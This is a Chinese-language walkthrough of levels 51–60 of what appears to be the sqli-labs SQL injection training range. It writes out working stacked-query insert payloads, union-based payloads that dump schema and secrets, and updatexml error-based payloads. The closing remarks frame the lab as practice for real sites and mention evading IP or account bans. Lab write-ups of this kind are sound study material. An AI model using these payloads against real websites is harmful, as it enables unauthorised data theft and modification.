五十一关
这一关我们直接使用堆叠注入:
?sort=1';insert into users(id,username,password) values(21,'Less51','Less51') --+
Less51数据成功插入!
五十二关
(堆叠注入,数字型,无回显)
直接使用堆叠注入:
?sort=1;insert into users(id,username,password) values(22,'Less52','Less52') --+
Less52数据成功插入!
五十三关
(堆叠注入,字符型(单引号),无回显)
这一关和五十二关区别在于单引号。使用堆叠注入
?sort=1';insert into users(id,username,password) values(23,'Less53','Less53') --+
Less53数据成功插入!
五十四关
从五十四关开始,后面的关卡偏向于实战,看见页面对我们通关的步骤限制在10次内。所以我们要模拟实战,争取每一步都用在刀刃上!!!快速通关。
开始默认用掉一次机会!哭哭!!!
第一步:猜参数接受类型
?id=1' 页面报错
?id=1'--+ 页面正常 判断参数接受类型为 id = '&id'
第一步判断用掉了两次机会!
第二步:猜字段
?id=1' order by 3--+ 页面正常
?id=1' order by 4--+ 页面错误 说明字段为3
第二步判断用掉了两次机会!
第三步:爆出回显点
?id=-1' union select 1,2,3 --+
第三步用掉了一次机会
第四步:爆数据库名
?id=-1' union select 1,database(),3 --+
第四步用掉了一次机会
第五步:爆表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
第五步用掉了一次机会
第六步:爆列名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='lbm0lvblbu'
做完第六步,就差爆数据了,我们还有最后一次机会!!
第七步:爆数据
?id=-1' union select 1,group_concat(secret_L6E1),3 from lbm0lvblbu--+
次数用完,我们的数据拿到了,有惊无险!!实战中不然ip给封了。
最后一步:提交数据
页面红字翻译:恭喜你成功了!!!
五十五关
这一关和五十四关类似,区别在于闭合方式是括号 () 。
根据上一关的代码,我们来快速通关一下。
第一步:爆数据库名
?id=-1) union select 1,database(),3--+ 得到数据库名为 challenges
第二步:爆表名
?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 得到表名为 e7vpre4wjj
第三步:爆列名
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='e7vpre4wjj' --+ 得到列名 id,sessid,secret_LM1G,tryy
第四步:爆数据
?id=-1) union select 1,group_concat(secret_LM1G),group_concat(tryy) from e7vpre4wjj --+
得到数据 087S2hFL91fDhMpALiqNNzi8
注意:这是我得到的数据,每个人得到的都不同,所以要靠自己探索出来!!!
数据提交,GAME OVER!
五十六关
这一关和五十五关类似,区别在于这关是 单引号 + 括号。
直接缪沙!!!我过关了,你呢?
五十七关
这一关和前面两关类似,区别在于这关是 双引号 。
顺干缪莎!!
五十八关
这一关只有5次机会,正所谓 机不可失,失不再来呀!!
这一关如果我们按照之前的联合注入,一步一步猜字段,步数肯定是不够的。所以第一时间想到报错注入!!
第一步:判断参数接受类型
?id=1' 页面报错,根据报错信息排除有括号的可能,参数接受只有单引号。
第二步:报错语句爆出表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
第三步:爆列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jwb13a7bqt'),0x7e),1)--+
第四步:爆数据
?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_EFU5) from jwb13a7bqt),0x7e),1)--+
提交数据,游戏结束!!
五十九关
这一关和五十八关类似,区别在于这关是数字型。
直接快速秒杀!!!
六十关
这一关和五十八、五十九关类似,区别在于这关是双引号+括号。
来秒杀一下!!(其实我也是第二次才过的关,现实中我们大不了换个号继续!!)
总结:
(1)这十关我们学了堆叠注入、报错注入;
(2)让我们从靶场走向实际场景中,实战中很多网站会限制你的访问次数,他会通过你的输入,你访问的流量大小判断你是否在入侵,然后封掉你 ip 或 账号!!